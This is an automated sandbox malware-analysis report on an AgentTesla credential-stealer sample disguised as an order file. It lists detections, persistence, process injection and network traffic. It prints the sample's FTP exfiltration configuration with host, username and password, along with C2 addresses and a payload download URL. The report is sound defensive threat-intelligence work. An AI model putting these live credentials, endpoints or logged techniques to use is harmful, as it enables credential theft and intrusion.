Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GEFA-Order 232343-68983689.exe

Overview

General Information

Sample name:GEFA-Order 232343-68983689.exe
Analysis ID:1529933
MD5:7edaa96c807197b45ffb4f442ab3bfaa
SHA1:a87db0d82f05e80b4511667c01305993d9265806
SHA256:359c1e634d4b0d664443dca2ef11d6f5d68dcd381d56845e9212766b8b67e64f
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GEFA-Order 232343-68983689.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fqhnalw.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Roaming\Fqhnalw.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 7872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fqhnalw.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Roaming\Fqhnalw.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 8048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 41 entries
              SourceRuleDescriptionAuthorStrings
              0.2.GEFA-Order 232343-68983689.exe.6ea0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3047c:$s2: GetPrivateProfileString
                    • 0x2fb9d:$s3: get_OSFullName
                    • 0x3118e:$s5: remove_Key
                    • 0x3136c:$s5: remove_Key
                    • 0x3227a:$s6: FtpWebRequest
                    • 0x33043:$s7: logins
                    • 0x335b5:$s7: logins
                    • 0x362ba:$s7: logins
                    • 0x36378:$s7: logins
                    • 0x37c7e:$s7: logins
                    • 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 8 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Fqhnalw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fqhnalw
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T15:01:45.449007+020020299271A Network Trojan was detected192.168.2.9497665.2.84.23621TCP
                    2024-10-09T15:02:02.253420+020020299271A Network Trojan was detected192.168.2.9498535.2.84.23621TCP
                    2024-10-09T15:02:10.076009+020020299271A Network Trojan was detected192.168.2.9498945.2.84.23621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T15:01:46.061718+020028555421A Network Trojan was detected192.168.2.9497755.2.84.23658997TCP
                    2024-10-09T15:01:46.068204+020028555421A Network Trojan was detected192.168.2.9497755.2.84.23658997TCP
                    2024-10-09T15:02:02.887826+020028555421A Network Trojan was detected192.168.2.9498655.2.84.23663612TCP
                    2024-10-09T15:02:02.893477+020028555421A Network Trojan was detected192.168.2.9498655.2.84.23663612TCP
                    2024-10-09T15:02:10.692825+020028555421A Network Trojan was detected192.168.2.9499055.2.84.23665429TCP
                    2024-10-09T15:02:10.698545+020028555421A Network Trojan was detected192.168.2.9499055.2.84.23665429TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: GEFA-Order 232343-68983689.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeAvira: detection malicious, Label: HEUR/AGEN.1309900
                    Source: 2.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeReversingLabs: Detection: 31%
                    Source: GEFA-Order 232343-68983689.exeReversingLabs: Detection: 21%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeJoe Sandbox ML: detected
                    Source: GEFA-Order 232343-68983689.exeJoe Sandbox ML: detected
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49818 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49870 version: TLS 1.2
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06F3DDF5h0_2_06F3DD70
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06F3DDF5h0_2_06F3DD60
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06F3D59Dh0_2_06F3D248
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 4x nop then jmp 06F3D59Dh0_2_06F3D238
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06B4DDF5h4_2_06B4DD70
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06B4DDF5h4_2_06B4DD60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06B4D59Dh4_2_06B4D238
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06B4D59Dh4_2_06B4D248
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06BCB12Fh6_2_06BCAE22
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06BEDDF5h6_2_06BEDD70
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06BEDDF5h6_2_06BEDD60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06BED59Dh6_2_06BED238
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4x nop then jmp 06BED59Dh6_2_06BED248

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49775 -> 5.2.84.236:58997
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49766 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49865 -> 5.2.84.236:63612
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49853 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49894 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49905 -> 5.2.84.236:65429
                    Source: global trafficTCP traffic: 5.2.84.236 ports 63612,65429,1,58997,2,21
                    Source: global trafficTCP traffic: 192.168.2.9:49775 -> 5.2.84.236:58997
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                    Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.9:49766 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: rubberpartsmanufacturers.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.000000000340C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.000000000320C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com/manxz/Pqbrsrcnsx.mp4
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49818 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49870 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: GEFA-Order 232343-68983689.exe
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F173E0 NtProtectVirtualMemory,0_2_06F173E0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F183B8 NtResumeThread,0_2_06F183B8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F173D8 NtProtectVirtualMemory,0_2_06F173D8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F183B0 NtResumeThread,0_2_06F183B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B283B8 NtResumeThread,4_2_06B283B8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B273E0 NtProtectVirtualMemory,4_2_06B273E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B283B0 NtResumeThread,4_2_06B283B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B273D8 NtProtectVirtualMemory,4_2_06B273D8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC83B8 NtResumeThread,6_2_06BC83B8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC73E0 NtProtectVirtualMemory,6_2_06BC73E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC83B0 NtResumeThread,6_2_06BC83B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC73D8 NtProtectVirtualMemory,6_2_06BC73D8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F56E5B0_2_06F56E5B
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_030BF6B00_2_030BF6B0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_030BD6C40_2_030BD6C4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD37300_2_06DD3730
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DDE4D00_2_06DDE4D0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD5D620_2_06DD5D62
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD71740_2_06DD7174
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD9E170_2_06DD9E17
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD9E280_2_06DD9E28
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DDCF900_2_06DDCF90
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DDD7080_2_06DDD708
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD37200_2_06DD3720
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD8C780_2_06DD8C78
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD8C680_2_06DD8C68
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD00400_2_06DD0040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD00070_2_06DD0007
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F142C00_2_06F142C0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1A1980_2_06F1A198
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F104080_2_06F10408
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F112E00_2_06F112E0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F112D30_2_06F112D3
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F142B00_2_06F142B0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1A2280_2_06F1A228
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F103D00_2_06F103D0
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1A1880_2_06F1A188
